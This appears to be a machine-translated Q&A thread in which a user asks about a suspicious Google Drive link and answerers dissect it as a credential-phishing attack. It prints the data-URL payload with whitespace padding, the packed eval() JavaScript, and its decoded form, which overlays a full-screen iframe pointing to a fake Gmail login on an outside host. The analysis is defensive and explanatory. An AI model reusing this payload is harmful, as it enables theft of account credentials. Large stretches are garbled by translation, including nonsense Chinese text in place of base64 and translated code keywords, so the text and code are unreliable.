Javascript 这是谷歌账户黑客吗?
我收到一位同事发来的电子邮件,其中附有一个文件,该文件似乎位于Google Drive上,一旦单击该文件,就会指向以下URL,该URL会重新创建Google帐户登录页面以窃取密码:Javascript 这是谷歌账户黑客吗?,javascript,php,password-protection,spam,virus,Javascript,Php,Password Protection,Spam,Virus,我收到一位同事发来的电子邮件,其中附有一个文件,该文件似乎位于Google Drive上,一旦单击该文件,就会指向以下URL,该URL会重新创建Google帐户登录页面以窃取密码: data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cscript%20src=数据:文本/html;base64,ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ通用汽车2.我国目前的一项研究目标是我国的一项研究。我国的一项研究目标是我国的一项研究目标是我国的一项2年8月8日8月8日8月8月8日,我国的一项研究目标是我国的一项研究。我国的一项研究目标是我国的一项研究目标是我国的一项2月8月8日8月8月8日,我国的一项2月8月8月8日,我国8月8月8月8月8日,我国8月8日的2月8月8日,我国8月8月8日,8月8月8日,我国8日,8日,8月8日,8月8日,8日,8日,8日,8日,我国8日,8日,8日,我的8日,我国8日,8日,我的8日,我的8月8日,我国8日,我的8日,我的8 X8Y3JLYXRLRWXLBWVUDHXIZWVUFGHHHDMV8WW91FHRPDGXLFFNPZ25LZHXVDXR8DMFYFGZ1BMN0AW9UFHRYEXMVGFWCGVUZENOAWXKFGNVBNR8D3B8Y2X1YNXZDHLSXXIB3JKZJ8AGVPZ2H0FHDPZHROFGDLZW1LBNRZQNLUYWDOYW1LFGJSDW2BW2BK2LJXBJJJJYXKKKKKKKKKK8YM9KYX8YXKKK8YKKKKKKKKKK8YKKK8YK8YKJ8YK8YKJ8YK8YK8YKZZZZZKKKKKKKKKKKKZZZZZZZZ8K8K
从脚本中是否有任何方法可以识别信息发送到哪里,我是否输入了电子邮件地址和密码 最好的解决方法是,当它提示您输入凭据时,检查您实际所在的域。如果它是谷歌域名,那么它是可以的,如果不是,那么它与钓鱼有关
在这里,你应该非常小心地检查域,攻击者会耍把戏,如果域是google,他们会创建非常类似的东西,比如google或geogle之类的东西。因此,请仔细检查域。让我们尽可能地分解攻击:
它是一个url,从基本的gmail登录链接开始,设置一些请求变量,以便在可能的情况下自动登录
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue
随后会出现大量空白,用于在浏览器地址栏中隐藏恶意负载
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
(等)
现在跟踪受害者的有效载荷。它是base64编码的
当我们解码它时,它看起来像这样:
eval(function (p, a, c, k, e, d)
{
e = function (c)
{
return c
};
if (!''.replace(/^/, String))
{
while (c--)
{
d[c] = k[c] || c
}
k = [function (e)
{
return d[e]
}
];
e = function ()
{
return '\\w+'
};
c = 1
};
while (c--)
{
if (k[c])
{
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}
('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
))
eval(功能(p、a、c、k、e、d)
{
e=功能(c)
{
返回c
};
如果(!''。替换(/^/,字符串))
{
而(c--)
{
d[c]=k[c]|c
}
k=[函数(e)
{
返回d[e]
}
];
e=函数()
{
返回'\\w+'
};
c=1
};
而(c--)
{
if(k[c])
{
p=p.replace(新的RegExp('\\b'+e(c)+'\\b',g'),k[c])
}
}
返回p
}
('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37=""10、10、40,“10、10、40,”10、10、40,“10、40,”10、10、40,“链接”链接|链接|链接|文件|文件|文件|文件|窗口|窗口|框架|框架| 100 |图标|图标图像|图像|图像| x | x |图像| x 124; x |捷径|捷径|捷径|捷径|捷径|捷径|捷径|捷径|类型类型|类型|类型|类型|类型| e | body | outerHTML | http | src'.split('|'),0,{
))
这是邪恶的、模糊的javascript。不要执行它
martinstoeckli的答案包含此脚本的扩展版本
它将当前选项卡的标题设置为模仿gMail的“您已注销”页面,并更改页面,添加一个无边框的屏幕填充iframe
iFrame指向(似乎是)一个受损的wordpress站点,该站点包含一个伪造的gmail登录页面。
在bluevoicepgh.club
上的假页面中输入凭据后(可能有人想通知这些人他们的wordpress网站可能已被泄露),然后您将被重定向到在后台悄悄登录的gmail页面。无论您在假登录页面中输入的凭据是否正确,都会发生这种情况
如果您确实在该页面中输入了有效的凭证,那么除非您查看其背后的脚本,否则无法知道该凭证会出现在何处
请记住,(谢天谢地)在当前形式下,由于谷歌的登录页面使用https(并强制使用https),攻击将无法正常工作。
正如chrome在执行脚本时提醒我们的那样:
混合内容:页面位于'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/脚本%3E'已通过HTTPS加载,但请求了不安全的资源'http://bluevoicepgh.club/wp-content/'. 此请求已被阻止;内容必须通过HTTPS提供。
脚本无法工作,因为google正在发送x-frame-options=deny
(浏览器需要尊重此标题),但链接的意图如下:
%20
是空白,人们希望通过这种方式隐藏URL的内容,因为下面的
window.document.title = "You have been Signed out";
try {
(function() {
var link = window.document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = '';
document.getElementsByTagName('head')[0].appendChild(link)
}())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://!!maliciousdomain!!.club/wp-content/\" style=\"border: 0;width: 100%;height:100%\"></iframe>";